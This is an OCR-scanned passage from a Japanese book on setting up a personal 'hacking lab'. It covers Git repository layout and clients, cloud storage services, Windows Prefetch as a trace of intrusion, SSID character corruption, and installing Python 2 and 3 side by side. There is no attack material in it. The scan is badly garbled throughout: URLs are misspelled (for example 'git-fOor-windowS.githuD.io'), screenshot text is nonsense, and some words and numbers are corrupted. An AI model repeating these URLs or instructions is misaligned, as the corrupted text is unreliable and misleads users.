今後 は hacking_lab と いう リポ ジ ト リ を 用 いて 、 プ ログ ラム な ど を 管理 し ます 。 
管理 する 対象 と し て は 、 プ ログ ラム の ソー スコ ー ド 、 ス クリ プ ト 、 設 定 フ ァイル 、 
文書 、 プ ログ ラム に 付随 する デー タ な ど に な り ま す 。 

だ だ し 、exe フ ァイル な どの バイ ナリ ファ イル は 、 基本 的 に 管理 する 必要 は あり 
ませ ん 。 バッ クア ッ プ の 意味 は あり ます が 、 バー ジョ ン 管 理 ("20) と いう 航 点 か ら 
は ほとん ど 意 味 が な いた めで す 。 

hacking-lab フ ォ ル ダー 直下 は 言語 に よっ て 分 類 し 、 言 語 名 の フォ ル ダ ー 直 下 は 
機能 に よっ て 分 類 し て いく こと に し ます ( 図 3.31) (*21)。 


し 
し の 
し 代 | 
[| 
し 半 
まっ 
に ーー 
Le 





図 3-31 フォ ル ダ ー 構 成 例 


asm フ ォ ル ダー に 関し て は 、 ア ー キ テク ナチ ナチ ャ ご と に サブ プ ブ 分 類 し ます 。 ま た 、 
python に 関し て は 2 系 と 3 系 で サブ 分 類 し て も よい で し ょ う 。 


*20 : ファ イル の 変更 履歴 を 管理 する こと で す 。 


*21 : GitHub は 2016 年 の 料金 プラ ン で 、 プ ライ ベー トリ ポジ トリ 数 が 無制限 に な っ た の で 、 言 語 
別に リポ ジ ト リ を 分 割 し て も よい で し ょ う 。 
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言語 の フォ ル ダ ー 内 は 、 主 に 機能 で 分 類 し ます 。 そ し て 、 基 本 的 な 文法 の サン 
プル な ど は basis に 含め る よう に し ます 。 

し か し な が ら 、 実 際 に は すべ て を 機能 ご と に 分 類 で きま せん 。 複数 の 機能 に ま 
だ た が る も の も あり ます し 、 機 能 と いう 枠 で 収め られ な いも の も あり ます 。 そう 
いっ た も の は 和 柔軟 に 、 適 著 適 所 に 配置 し て いま す 。 本来 で あれ ば 、 タ グ を 活用 し 
て ツリ ー 状 だ け で な く 、 網 状 に 分 類 で きれ ば よい の で す が 、 本 書 で は そこ まで 追 
求 し ませ ん 。 


どの Git ク ライ アン ト を 使う の か 


Git ク ライ アン ト に は 、 以下 で 紹介 する も の 以外 に も た くさ ん 存在 し ます 。 Git ク 
ライ アン ト を 混在 させ る こと も 可能 で す 。 好 み の も の を 探し て みる と よい で し ょ 
う C22)。 


Git for Windows 
http://git-fOor-windowS.githuD.io/ 


CUI。Windows 版 の Git コマ ンド の 本 体 。Git BasSh も イン スト ー ル で きる 。 


TortoiseGit 
https://tortoisSegit.Org/ 


GUI。 TortoiseSVN の Git 版 。 SVN の 経験 者 に 向い て いる 。 Windows の エク スプ ロー ラー に 統合 
され る 。 


SOu「Ce Tre@e 
https://ja.atlassian.com/software/Sourcetree 


GUI。Git の コマ ンド 群 と 画面 が 対応 し て いて わか りや すい 。 コ ミッ トロ グ が きれ い に 表 示さ れる 。 
管理 する ファ イル が 多く な る と 動作 が 重く な る こと が ある 。 





*22 : GUI の Git ク ライ アン ト は 、 次 の サイ ト で 紹介 され て いま す 。 
https//git-scm.com/dowmloads/guus 
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Git ExtensionSs 
https://gitextenSionS.gthuD.io/ 


GUI。 ス テー タス アイ コン オー バー レイ の 表示 が な い 。 





Git 初心 者 で あれ ば 、GUI 版 の クラ イア ント が 向い て いま す 。 な ぜ な ら ば 、 ど の 
ロー カル リボ ポジ トリ を 作業 し て いる の か が 直観 的 に わか りや すい か ら で す 。 し か 
し な が ら 、 目 分 が レベ ル ア ッ プ し て いく うち に 、 逆 に 不便 に な っ て くる こと も あ 
り ま す 。 

また 、 書 籍 や Web の Git に 関す る 説明 は コマ ンド が 使わ れる こと が 多く 、 そ れ を 
すぐ に 試す た め に は コマ ンド に 慣れ て いる 必要 が あり ます 。 つ まり 、 学 習 の 過程 
で は CUI の Git ク ライ アン ト も 必須 と いえ ます 。 

そこ で 、Git for Windows と 、 好 み の GUI の Git ク ライ アン ト を イン スト ー ル し 
て 併用 する と よい で し ょ う 。 GUI の Git ク ライ アン ト を 立ち 上 げ て お く と 、 状況 の 
確認 に 便利 と いえ ます 。 こ れ に より 、 操作 の 回 数 を 減ら し た り C23)、 ミ ス を な く 
じ た だ りや まめ 

仕事 の 現場 で Git の 操作 を ミス し て し まう と 、 他 人 に 迷惑 を か け て し まい ます 。 
そう いっ た ミス を 減ら す た め に も 、 自 宅 の 環境 で Git の 操作 に 慣れ て お いた 方 が よ 
いで し ょ う 。 自宅 の 環境 で あれ ば 、 ミ ス を し て も た いし た こと に は な り ま せん 。 始 
め は コマ ンド 一 覧 の メモ を 参照 し な が ら で も よい の で 、CUI で 操作 し 続け て いく 
と 、 徐々 に 慣れ て いき ます 。 

その 経験 が あれ ば 、 現場 で の Git の 操作 ミス に 対し て も すぐ に 対応 で きる よう に 
な り ま す 。GUI の 場合 、 ほ と ん ど 使 わな い 操作 は どの メニ ュー や ボタ ン を 押せ ば 
よい か わか ら な か っ た り し ます 。 ま た 、 ソ フト ウェ ア の 差異 に よっ て 戸惑う こと 
も ある で し ょ う 。 コ マン ド で あれ ば そう いっ た 心配 は あり ませ ん 。 


*23 : git status、gt diff、git branch な どの コマ ンド を 打つ 手間 を 回 避 で きま す 。 
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3-17 | クラ ウド スト レー ジ の 活用 





kdi 誠 la ス が 提供 され て いま す 。 本書 で は 、PC 内 の 
フォ ル ダ ー 内 と 、 オ ン ラ イン の クラ ウド スト レー ジ 内 を 目 動 で 同期 する サー ビス 
を お すす めし ます 。 これ を 使え ば 、 柱 あ 林間 で フォ ル ダ ー 内 を 同期 で きま す 。 
これ に より ファ イル の バッ クア ッ プ を 実現 し つつ 、 作 業 効率 を 向上 で きま す 

オン ライ ン と オフ ライ ン で の 基本 的 な 動作 は 次 の 通り で す 。 


* オンライン に な る と 、PC 内 の 同期 フォ ル ダ ー の 中 身 と 、 オ ン ラ イン の 保存 領域 
の 中 身 は 自動 的 に 同期 され る 。 

* オ フラ イン で あっ て も 、 キ ャ ッシュ 機能 に より スト レー ジ 上 に ファ イル が 人 存在 
する だ た だ ため アク セス で きる 。 つ まり 普通 の ロー カル ドラ イプ ブ と 同様 に 扱え る 。 


こう し た サー ビス の 多く は 、 共 同 作 業 機能 や 、 第 三 者 へ 一 部 の ファ イル を 共 有 
する 機能 も 備え てい ます 。 ま た 、 更 新 履歴 を 保持 する た め 、 過 去 の ファ イル の 内 
容 に 戻せ ます C24) 。 


沙 代表 的 な クラ ウド スト レー ジ サ ービス 
サー ビス は だ た くさ ん あり ます が 、 こ こ で は 有名 な も の を 紹介 し ます 。 


人 @ Dropbox 

任意 の メー ル ア ド レス が 1 つ あ れ ば 開始 で きる 。 

個人 向け の サー ビス で は 最も 多く の 利用 者 が いる 

s Basic プ ラン は 無料 で 2C バ イト 、Pluns プ ラン は 了 1200 円 で 1T バ イト に な る 
利用 時 は 2G バイ ト と 少な い が 、 友 達 を 1 人 招待 する た びに 500M バイ ト 狼 得 で 
きる 。 招待 し た 友達 の 容量 も 増え る の で 、 独 り 占 め に な ら な い 。 

s アク セス 権限 は フォ ル ダ ー 単 位 で 設定 する 。 


へ 
Dropbox 


https://wwwdropbox.com/ja/ 
い 、 人 


24 : バージョン 管 理 ソ フト の よう に 作業 状態 を 過去 の 状態 に 戻せ ます 
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る Google Drive 

s Google ア カウ ント が 必須 。 

* 最初 か ら 無料 で 15G バ イト を 扱え る 。 

* Google ローカル ガイ ド で ボイン ト を た め て レベ ル を 昇格 すれ ば 、 1T バ イト まで 
無料 で 使え る 。 

* 有料 プラ ン も 用 意 さ れ て いる 。 

s* ア クセ ス 権 限 は フォ ル ダ ー と ファ イル どちら に も 設定 で きる 。 

*・ 利用 規約 に 「 アップロード し た ファ イル の 利用 権 を Google に 与え る 」 と いう 意 
味 に と ら え られ る 一 文 が 入っ て いる 。 


Google Drive 


https://wwwrgoogle.com/intl/ja_ALL/drive/ 





@ OneDrive 

* Microsoft ア カウ ント が 必須 。 

・ 誰 で も 無料 で 約 5G バイ ト の 容量 の スト レー ジ 領 域 を 扱え る 。 

・ 有料 プラ ン も 用 意 き され て いる 。 

* Windows 10 で は 、 OneDrive が OS の 機能 に 統合 され た 。 こ れ に より 、 エ クス プ 
ロー ラー 上 で OneDrive へ の 操作 が 簡単 に で きる 。 

* Microsoft の サー ビス な の で 、Microsoft Office と 親和 性 が 高い と いえ る 。 

* Google Drive と 同様 に フォ ル ダ ー・ フ ァイル 単位 で 権限 管理 が で きる 。 


OneDrive 


https://onedrive.live.com/about/ja-jp/ 





OneDrive と Dropbox の ファ イル の 復元 の 違い 


OneDrive と Dropbox の どちら も 、 フ ァイル や フォ ル ダ ー を 通常 の ファ イル と 同 


様 に エク スプ ロー ラー で 操作 で きま す 。 し か し 、 削 除 し た ファ イル の 復元 に つい 
て は 若干 の 差 が あり ます 。 
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OneDrive の 同期 フォ ル ダ ー 内 の ファ イル を 削除 し た と し ます 。 す る と 、 
Windows の ゴミ 箱 に 入ら な いた め 、 エ クス プロ ー ラ ー か ら は ファ イル を 復元 で き 
ませ ん 。 復元 する 場合 に は 、 オ ン ラ イン の OneDrive に アク セス し て 、 プ ラウ ザ か 
ら ゴミ箱 に アク セス し て ファ イル を 復元 し ます 。 

一 方 、Dropbox の 同期 フォ ル ダ ー 内 の ファ イル を 削除 し た と し ます 。 こ れ は 、 
Windows の ゴミ 箱 に 入っ て いる の で 、 エ クス プロ ー ラ ー か ら 復 元 で きま す 。 


湊 同期 フォ ル ダ ー を 使わ な い ケ ー ス 


自動 同期 は 非常 に 便利 で す が 、 逆 に 問題 を 引き 起こ す 場 合 も あり ます 。 

例え ば 、 何 カ月 も 使用 し て いな い (ある い は ずっ と オフ ライ ン だ っ た ) PC を オ 
ン ラ イン 状態 に し た と し ます 。 す る と 、 自 動 同 期 が 動き 出し 、 何 カ月 に も わた っ 
て 積もり 積もっ た オン ライ ン の 保存 領域 に ある ファ イル が 、 ま と め て ダウ ン ロ ー 
ド さ れ ま す 。 ネ ットワーク 帝 域 を 占め 、 さ ら に その PC で は ファ イル 作成 ・ 削 除 の 
ディ スク アク セス が 行わ れ 続け ます 。 そ の 結果 、 そ の PC で 作業 が で き な い ほど 重 
く な っ て し まう こと が あり ます 。 場合 に よっ て は 、 数 時 間 作業 が で き な い 状況 に 
な っ て し まい ます 。 

別 の ケー ス と し て 、 数 G バ イト で あれ ば 古い PC や スマ ホ で あっ て も 対応 で きま 
す 。 し か し 、1T バ イト レベ ル に な っ て し まう と 対応 で きま せん 。 メ イン PC は ス 
ペッ ク が それ な り に 高い は ず な の で 、1]T バ イト の 同期 フォ ル ダ ー が あっ て も 問題 
あり ませ ん 。 し か し 、 古い PC や スマ ホ な ど は テラ バイ ト の スト レー ジ で は な いた 
め 、 自 動 同期 する と ファ イル が いっ ぱい で 何 も で き な く な っ て し まい ます 。 

以上 の よう に 、 あ まり 使用 し な い PC、 古い PC、 ス マ ホ や タプ レッ ト で は 、 同 期 
フォ ル ダ ー を あえ て 使わ な いと いう 選択 を し ます 。 ス トレ ー ジ 内 の ファ イル を 扱 
いた けれ ば 、PC で あれ ば プラ ウザ で サー ビス に アク セス し ます 。 ま た 、 ス マ ホ や 
タブ レッ ト で あれ ば 、 専 用 アプ リ が ある の で 、 そ れ を 使う こと で 簡単 に サー ビス 
に アク セス で きま す ( 図 3.32)。 ア プリ の 機能 に より 、 オ フラ イン に ファ イル を 個 
別に ダウ ン ロ ー ド で きま す 。 容量 が 大 きく 、 頻 繁 に 参照 する よう な 動画 ファ イル 
や PDF フ ァイル は 、 一 度 オ フラ イン に ダウ ン ロ ー ド し て お け ば 、 読 み 込み に 時 間 
が か か る こと も あり ませ ん 。 
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3-32 iOS の Dropbox アプ リ 


泡 カメ ラ ア ッ プ ロー ド 機 能 

例え ば 、 メ モ を 目的 と し て 書籍 の 一 部 を スマ ホ や タブレット で 撮影 し た り 、 電 
子 書 籍 の 一 部 を スク リー ン シ ョ ッ ト で 記録 し た り し ます 。 そ し て 、 こ れ ら を 分 類 ・ 
閲覧 する た め に 、 撮影 し た 画像 (スク リー ン シ ョ ッ ト も 含む ) を PC で 扱い た い 場 
合 が あり ます 。 一 番 シ ンプ ル な の は 、 フ ァイル を メー ル に 添付 し て 送信 し て 、PC 
側 で 受信 する こと で す 。 し か し 、 フ ァイル の 数 が 大 量 で あっ た り 、 い ちい ち メ ー 
ル を 送信 し た りす る 手間 が か か り ま す 。 そ うい っ た 場合 は 、 カ メラ アッ プロ ー ド 
機能 が 便利 で す 。 

撮影 する と 、 ア ル バ ム アプ リ (Android で あれ ば 「 ギ ャ ラリ ー」、iOS で あれ ば 
| 写真 」) に 画像 が 登録 され ます 。 

Dropbox アプ リ で カメ ララ アップロード 機 能 を 有効 に する と 、 特 定 の タイ ミン グ 
(*25) で 、 著 えら れ た 画像 が Dropbox の オン ライ ンス トレ ー ジ 領域 に アッ プロ ー ド 
され ます 。 そ の 時 点 で PC が オン ライ ン で あれ ば 、 ロ ー カ ル の 同期 フォ ル ダ ー に 画 
像 ファ イル が 同期 さき れる と いう わけ で す 。 


*25 : Wihi 接 続 時 に アッ プロ ー ド する な どの 設定 が で きま す 。 そ の 場合 、WiEi に 接続 し た 状態 で 
Dropbox ア プリ を 起動 する と 、 フ ァイル が アッ プロ ー ド され ます (場合 に よっ て は 裏 で アッ プ 
ロー ド 処 理 が 実行 さき れる こと も あり ます )。 
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3-18| Prefetch 機 能 を 有効 に する 





Windows で は 、Prefetch 機能 が 有効 に な っ て いる と 、 一 度 実 行 し た プロ グラ ム 
が 再び 利用 きれ る こと を 想定 し て 、 そ の デー タ を あら か じ め メ モリ 上 に 読み 込み 
ます 。 プ ログ ラム の 実行 を 高速 化 に する た め の キ ャ ッシュ と いえ ます 。 

この Prefetch 機 能 は 、 キ ャ ッシュ と いう 観点 だ け で な く 、 セ キュ リティ の 観点 
か ら も 有効 で す 。 も し PC に 侵入 され た と し て も 、 侵入 者 の 揉 作 の 痕跡 が Prefetch 

ファ イル に 残る 可能 性 が ある か ら で す 。 実行 し た 記憶 が な い プ ログ ラム が あっ た 

、 不 自然 な 時 間 に 管 理 ツ ー ル が 実行 され て いた りす れ ば 、 侵 入 き され た 恐 れ が あ 
る と 推測 で きま す 。Windows Vista 以降 は 、 さらに 機能 を 向上 きせ た SuperFetch 
が 採用 され て いま す 。 

96SystemRoot9%\Prefetch フォ ル ダ ー に ある Prefetch フ ァイル (pf と いう 拡 
張子 ) が あれ ば 、 そ の ファ イル 名 の プロ グラ ム が 少な く と も 1 度 は 実行 され た こと 
を 意味 し ます 。 逆 に 、 こ の フォ ル ダ ー を 確認 し て 何 も な けれ ば 、 機 能 が 無効 に な っ 
て いる 可能 性 が あり ます 。 

例え ば 、WinPrefetchView (http://www.nirsoftnet/utils/win_prefetch_yiew. 
html) と いう ツー ル を 使う と 、Prefetch ファ イル を 解析 し て 、| 起動 し た アプ リ 名 」 
最終 起動 日 時 ] | 起動 回 数 ]」 | 読み 込ん だ ファ イル の パス 」 が わか り ま す ( 図 3-33)。 


Flo Edit Visw Opetions Help 

XX 回国 軌 西 約 也 

hlenerne / Crested Timec Modfod Trmc Poocs5 PE Proccs5 Poth ! LgRunTlme “ 
mW 1 品 ACHFLAYERUED 201 /O1/13 ( 合 ) 19.05:10 201 が 11J03 ( 例 ) 23:05:00 rbz6 し 5HFLAYERMUW じ -WWndowwlibrrvWOwub4sHar 20 地 2014/】1O】 ( 合 ) 
TFP_BDOS.EXE コ 3.。 2016 の 32/22 ( 木 ) 1:37:35 2017 有 1 ( 全 ) 15 す 19 27> 『P_5MBIOS.EXE に :*PROCRAM FILES*LenowofL。 209 1103 ( 信 
回 FRiTZiN こ EXE.OE2-。 2017 が 1)01 ( ま ) 16:47:15 。 2071/Oi ( 表 ) 16:SS16 2105 FRITZiNC_EXE C:WAPpPRITZINC.0.9.3H.64.F- 2017/11/01 ( 衣 ] 
mAkF EXE・AFHRHFF 201 が 11/02 (本 ) 1 た 12!01 201 が 11J0J ( 到 ) 1 た 1201 51 6 (GAME に XE し TPROGNAM FILOS (Cp」Y5T 2⑳1 リ 1】1/0 ょ 』 ( 友 ) 

331.220 IS0 で いす 1 | に 


1, 201 げ 11 リ /03 ( 共 ) 0-30: 3 57 リロ 3 ( 吉 ) 20c390: お N (ETWIOVeR.E2E に : で PROCTAUMHATAWLgnowvoesY_。 


まさ ペペ ニョ 。 パニ 1 ささ = デュ に ま ミネ SS NN ! N キネ デー に まま IN ペー ーー に 4 





Pull Path Device Peth 
C\Windows ミ LOBALIZATIOWEWSortng\BCRTDEFAUILTNLS DEVICENHARPOISKWOELME2*3FT 

で APDvAPT32 DL CVVrndowswvSysWowWreyaeyspt は 3 | wCFVICPNLARCOSKVOLUMF2YWINOOWPrSYSW. 
AI-MSFWIN-DOWNLEVE .。、C:YVWnd0wsYGysW0WCA 相 -M5-WiN-DOWNLEVEIL-ADVA 相 32- し 1-1-0.DLL *DEVICESHTARDODISKWOMLUNE2YWINDOWSFSYSw. 
AR 145-Mih OOWNLEVE CiVVWindowswSysWOWCWAPI-M5 WiNDO が NLEVSLNORMALE- し 1-1 0.DLL 3DEVICENLAFDOSKWOLUMESYWINDOW が SrSYSW. 
AE-M5-WIN-DOWINLEVE て WWWindowswSycWDWCKAPI-MS_WIN_DOINLEVEI-SHLWAP]-L1-1-0.DtL DEVICEPWRIRDDISKWOLLUNME2WWINDD が SeSYSwWy.- 
① ヾ APW-M5.WIN.DOWNLUPVW CVWindowswSywWOWrdAP(-M5LWIN_COOWNLPVILUSER32.1-1.9.DUL wCTVICPwLARCOSKVOLUMF2VWINDOWPr5Y る Wi. 
NAK-M45-WIN-DOWNLEVE CiWWindowSwSysWOWCHAPI-M5-WIN-DOWNLEVEL-YERSION-L1-1 ODMUL 4DEVICENHARDDISKWOLUME2YWINDOWSESYSW 





3-.33 WinPrefetchView 


た だ し 、 プ ログ ラム の 最終 起動 日 時 と Prefetch ファ イル の 作成 日 時 は 同一 に な 
り ま せん 。 





198 | 第 1 部 | ハッ キン グ ・ ラ ボ の 樹 築 


ら バ イト の SSID が 文字 化け する 


無線 LAN の SSID に は 、 通 常 は 英 数 字 列 を 設定 し ます が 、 拡 張 機 能 で 日 本 語 (2 
バイ ト 文 字 ) も 使用 で きま す 。 た だ し 、 無線 LAN の クラ イア ント 側が 拡張 機能 に 
対応 し て いな いと 、 日 本 語 が 文字 化け し ます 。 

例え ば 、Windows 10、Android、 ijOS で は 対応 し て いま す が 、Windows 7 (付属 
の クラ イア ント ) で は 対応 し て いま せん ( 図 3.34)。 文字 化 け は し ます が 、 選 択 す 
れ ば 接続 で きま す 。 


ヶ 中 


文字 化け し て いま す 。 


FE9BB84FESB/HEE381AE4C414 ヒ 


E5BF9CE4BB81E381A ヒ FE4C3414E 





図 3.34 Windows 7 付属 の 接続 クラ イア ント 





| 第 3 章 | ホス ト OS の 基本 設定 199 


3-19| Windows に Python 環 境 を 構築 する 





Python は 、2020 年 に 2 系 の サポ ボー ト を 廃止 する と いわ れ て いま す 。 つ まり 、 こ 
れ か ら Python の プロ グラ ム を 作成 する の で あれ ば 、3 系 で 作成 し た に 方 が よい で 


し ょ う 。 し か し な が ら 、 書籍 や Web で は 、 Python2 系 の コー ド と 3 系 の コー ド が 混 
EC まさ 。 また K き すむ き 生 の 補 本 本 まま uo なあ は も : か いき 
ませ ん 

そこ で 、 こ こ で は Python の 2 系 と 3 系 の プロ グラ ム を Windows で 動か せる よう 


に する こと を 目標 に し ます 。 し か も 、 場 面 に よっ て 簡単 に 切り 替え られ る よう に 
し ます 。 さらに 、site-packages を 独立 し て 管理 する こと で 、 き れい な 状態 の 実行 
環境 を 用 意 で きる よう に し ます 。 


沙 Python2 と Python3 の 混在 環境 の 構築 
DPY.exe と いう ラッ パー (ラン チャ ー と も いえ る ) で 切り 共 え る 方 法 を 紹介 し ま 
す ・ 


人 @ py.exe の イン スト ー ル 


1 わ 2 系 と 3 系 の Python を タウ ン ロ ー ド する 

Python を 公式 サイ ト か ら 最 新版 の 2 系 と 3 糸 の Python を ダウ ン ロ ー ド し ます 。 
ここ で は python-2.7.15msi と python3.6.5exe を ダウ ン ロ ー ド し まし た 。 
- SS 

Download Python | Python.org 


https://wwwrpython.org/downloads/ 
と 7 、 


2 Python3 系 を イン スト ー ル する 
Python3 系 に は py.exe が 含ま れ て いる の で 、Python3 系 か ら イ ンス トー ル し 
ます (*26)。 イ ンス トー ラー を 立ち 上 げ る と 、 イ ンス トー ルル 方 法 の 選択 が う な が さ 


26 : Python の 2 系 と 3 系 で は 、 イ ンス トー ラー の イン ター フェ ー ス が 異な り ま す 。 ま た 、 同 一 系 
統 で も バー ジョ ン に よっ て も 、 イ ンタ ー フ ェ ー ス が 異な る 可能 性 が あり ます 
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れ ま す 。| Add Python 3.5 to PATH」 に チェ ッ ク を 入れ ず に 、[Customize installation」 
に 進み ます ( 図 3-35) 。 


み Pyinon 365 (32-b) Setup 


Install Python 3.6.5 (32-bit) 


Select Install Now to install Python wth default setindS。 Or ChOOS= 
Customire *O enaDble or disable faYures. 


@ Install Now 
に \UscrsiPu srO ロ TTADPpData さ Loc alYProeamsThon き Python 36- う 2 


Includcs IDLE. pp nd documecntahon 
Create: 2hocut5 and flle aczociations 


っ Customize installaton 
{hoos= loc abon end lestures 


puthon 


WInOdOWS Acd Pytnon 3.6 to PATH 


Install launcher for all ussrs (recommendedl 





図 3.35 イン スト ー ル 方 法 の 選択 


デフ ォ ル ト の まま 先 に 進み ます 。 「 Advanced Options」 の 設定 画面 が 表示 され ま 
す 。 

| Add Python to environment variables| の チェ ッ ク を 外し て 、 環境 変数 PATH 
に この バー ジョ ン の "python.exe" の パス が 追加 され な いよ うに し ます 。 こ の 設定 
は 重要 な の で 、 忘 れ な いよ うに し て くだ さい 。 

また 、「Install for all users] に チェ ッ ク を 入れ な いと 、 デ フォ ルト の イン スト ー 
ル 先 が 「%appdata%」 配下 に な り ま す 。 こ こ で は チェ ッ ク を 入れ て 、 全 ユー ザー 
が 利用 で きる よう に し ます 。 チェッ ク を 人 れる と 、 イ ンス トー ル 先 は C ぼ Pro 
gram Files (x86)\Python36-32 に な り ま す が 、'C\ ぎ Python36-32 に し ます ( 図 
3-36)。 こ れ は 、 後 に イン スト ー ル する Python2 系 と イン スト ー ル 先 の ディ レク ト 
リ で 並ぶ よう に する た めで す 。 

イン スト ー ル が 完了 する と 、'C: そ Windows\py.exe の 存在 を 確認 で きま す 。 
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Advanced Options 
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図 3-36 「Advanced Options] の 設定 画面 


3 Python2 系 を イン スト ー ル する 
Python2 系 を イン スト ー ル し ます 。 イ ンス トー ラー を 立ち 上 げ 、 全 ユ ー ザ ー が 使 
える よう に 「Install for all users| に チェ ッ ク を 入れ て 進み ます ( 図 3-37)。 


良 Python z715 Setup 


Seloct whothor to install Pythom 2.7.15 
Wor all users of this Comwputer. 


(@) jnstal for 唐 asers 


(し )lnsz 





図 3.37 全 ユ ー ザ ー が 使う か どう か の 確認 
イン スト ー ル 先 は "C\Python27" に し ます ( 図 3-38)。 


衣 Python z7.15 Scup 
Saqlqct Deshination Dirwctory 


Plsase selert adirectoY for the PYthon 2.7 15 es. 





Python27 


puthon 


Windows 





図 3.38 イン スト ー ル 先 の 指定 
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| Customize Python xx.x」 と いう 画面 が 出 た ら 、 | Register Extensions] を イン 
スト ー ル 対象 か ら 外 し ます ( 図 3.39)。 こ の 設定 は 忘れ な いよ うに し て くだ さい 。 
これ に チェ ッ ク を 入れ る と 、".py ファ イル を 実行 する python 本 体 が 上 書き され て 


し まい ます 。 


庄 Python >7.15 Setup 


Customize Python 2.7.15 


Selet he way YOU wait fgatures 【O be nctaled、 
CKx on the Ions hn ie lee benw to (hanoe the 
Wa features wil be nalleg. 


ーー * 
Hska ths Python instaahon th dalfauk Prthon 
Instalgtion 


puthon 
Windows 
Dekags] [Ahescsd 居 ユ ー 血 | 回 下台 較 匠 ーー 周 


This feakurg rmquirms 0KB on your hard drwg. 





図 3-339 カス タマ イス 画面 


後 は イン スト ー ラ ー に し た が っ て イン スト ー ル を 完了 させ ます 。 以上 で 混在 環 
境 の 構築 は 完了 ま ネム 


但 py コマ ンド に よる Python コー ド の 実行 方 法 

"py.exe" は 、Python を 起動 する ラッ パー の よう な 存在 で す 。 引 数 に 指定 し た 
バー ジョ ン の Python を 実行 し ます 。 

Py.exe は C\Windows 配下 に 存在 する の で 、 コ マン ド プ ロン プ ト で も 実行 
で きま す (も と も と "C:\Windows" に パス が 通っ て いる か ら )。 つ まり 、py コ マン 
ド と し て 扱え る と いう こと で す 。 

Python2 系 で 実行 する の で あれ ば 、 次 の よう に -2 を 指定 し ます 。 


>py -2 <Python プ ログ ラム の ファ イル > 


また 、Python3 系 で 実行 する の で あれ ば 、 次 の よう に -3 を 指定 し ます 。 
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>py -3 <Python プ ログ ラム の ファ イル > 


の プ グ ) D。。 る を の レク の に ア み ャ ノ = 
3 系 の Python で ある 34 と 35 を イン ス 


指定 する と 新しい バー ジョ ン が 適用 きれ ます 
で 、 吉 い バ ー ジ ョ ン を 起動 で きま す 。 


>py -3.4 <Python プ ログ ラム の ファ イル > 


倫 対話 型 シ ェ ル を 起動 する 
Python の 対話 型 シ ェ ル 


「 2 8 際 - 人 


すっ 


3 ( 図 3-40) 


>Dy -2 





3-40 


バ パー ジョ ン こ ご こと の 対話 型 シ ェ ル の 起動 


Dy コマ ンド は 、-2 や -3 と いう オプ ショ ン の 指定 
の Python を 起動 し ます 


に テ ュ 6 日 ヽ ーー ド こ ヽ Ka =。 で 。 
が な い 場 合 、 新 し い バ バージョン 





204 


| 第 1 部 | ハッ キン グ ・ ラ ボ の 構築 


た だ し 、 Python プロ グラ ム の 先頭 に シェ バン (*27) が ある と き 、py は これ を 優 
移し ます 。 本書 の よう に 2 系 と 3 系 を 混在 させ た 場合 、| 電 /usr/bin/python」 と い 
う シ ェ バ ン が ある と 、Python3 が 起動 され ま す 。Python2 で 起動 し た い 場 合 に は 、 
「 電 /usr/bin/python2」 に 変更 し て py コマ ンド を 実行 する か 、 明示 的 に -2 オ プシ ョ 
ン を 指定 し て py コマ ンド を 実行 し ます 。 


氷 実行 環境 を 切り 分 ける 

こう し た サン プル を 動作 させ る た め に 、 pip で パッ ケー ジ を イン スト ー ル し ます 
が 、 こ れ を 繰り 返し て いる と site-packages 配 下 に 多く の ライ ブラ リ が 配置 され て 
し まい 、 場合 に よっ て は 依存 関係 に より エラ ー が 発生 し て し まう こと が あり ます 。 

これ を 解決 する た め に 、 仮 想 の Python 環 境 を 簡単 に 構築 する 方 法 を 紹介 し ま 
す 。 

Python に は 仮想 の 環境 を 管理 する パッ ケー ジ が 用 意 き れ て いま す 。 2 系 で は 
virtualenv、 3 系 で は venv が 使わ れ ま す 。 い ずれ も 同じ よう な 仕組 み で あり 、 使 い 
方 も 仏 て いま す 。 


人 @ 基本 的 な 仕組 み 


例え ば 、"python venv < 仮想 の 実行 環境 名 >" を 実行 する と 、 カ レン トディ レク 
トリ に 指定 し た 環境 名 の フォ ル ダ ー が 生成 され ます 。 さら に 、 この 中 に は "python. 
exe' (起動 に 使う Python 本 体 ) 、site-package が コピ ビー され ます 。 

カレ ント ディ レク トリ を この フォ ル ダ ー に 移し 、 pip な ど で パ ッ ケ ー ジ を イン ス 
トー ル す る と 、 こ の フォ ル ダ ー 内 の site-package に ダウ ン ロ ー ド され ます 。 つ ま 
り 、 大 元 の site-package に 手 が 入 ら ず 、 き れい な 状態 を 維持 で きま す 。 


@ pip が 導入 され て いる か を 確認 する 

pip は Pythonm の パッ ケー ジ を 管理 する 仕組 み で あり 、Python 3.4 以 降 の バー 
ジョ ン で あれ ば デフ ォ ル ト で イン スト ー ル され ます 。 

次 の よう な 結果 が 返 れ ば 、pip は イン スト ー ル され て いま す 。 


27 : UNIX の スク リプ ト の 先頭 に ある | 朝 | か ら 始 まる 行 の こと で す 。Python で は | 拓 /usr/bin/ 
python] な どの よう に 記述 され る こと が 多い と いえ ます 。 





| 第 3 章 | ホス ト OS の 基 本 設定 205 





も し 、 イ ンス トー ル さ れ て いな い 場 合 は 、 次 の よう に 入力 し て イン スト ー ル し 
ます C*28)。 





人 @ Python2 系 に virtualenv を イン スト ー ル する 


カレ ント ディ レク トリ を "C:\Python27\Scripts"” に 移動 し て 、pip で virtualenvy 
を イン スト ー ル し ます 。 こ の と き 使 用 する pip の 実行 ファ イル 名 は 、 先ほど 確認 し 
た pip の バー ジョ ン と 対応 し て いる こと に 気 を 付け て くだ さい 。 





で virtualenv を 試し て みる 


① 仮 想 環境 の フォ ル ダ ー を 新規 作成 する 
任意 の ディ レク トリ に カレ ント ディ レク トリ を 移し て 、 次 を 実行 し ます 。 


*28 : "get-pippy' を 使っ た pip の イン スト ー ル 方 法 は 、 次 の URL を 参考 に し て くだ さい 。 本 書 で は 
混在 環境 で ある た め 、py コマ ンド で -2 オ プシ ョ ン を 指定 し て 実行 し ます 。 
https//pip.pypa.io/en/]atest/installing/ 
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ここ で は test_env" と いう 環境 名 に し て 、 そ の フォ ル ダ ー 内 を 確認 し て み ま す 
( 図 341) 。 





 。 慎 % 切り 区 り 昌和 -| XX 


の 2 グ 2 宮 に HE 

AE を 岡 >- ト カッ ト の 中 9 け 妥 平 - 先 -| 呼 m 
生 

を - * | 目 * ユー ザー > ipusiron > デス ワウ トッ プ ぅ tcst_cny 


時 クイ ッ ク アク セス 
画 | テス クト ッ ブ 
ダウ 9 ン ロ ー ド 
ドキ ュ メ ント 
ビ 2 チ ャ 
 $ 


_」 win10 





図 3.41 test env フ ォ ル ダー の 内 容 


② 仮 想 環境 を 起動 する 
カレ ント ディ レク トリ を Script フ ォ ル ダー に 移動 し ます 。 "activate.bat' が 存在 
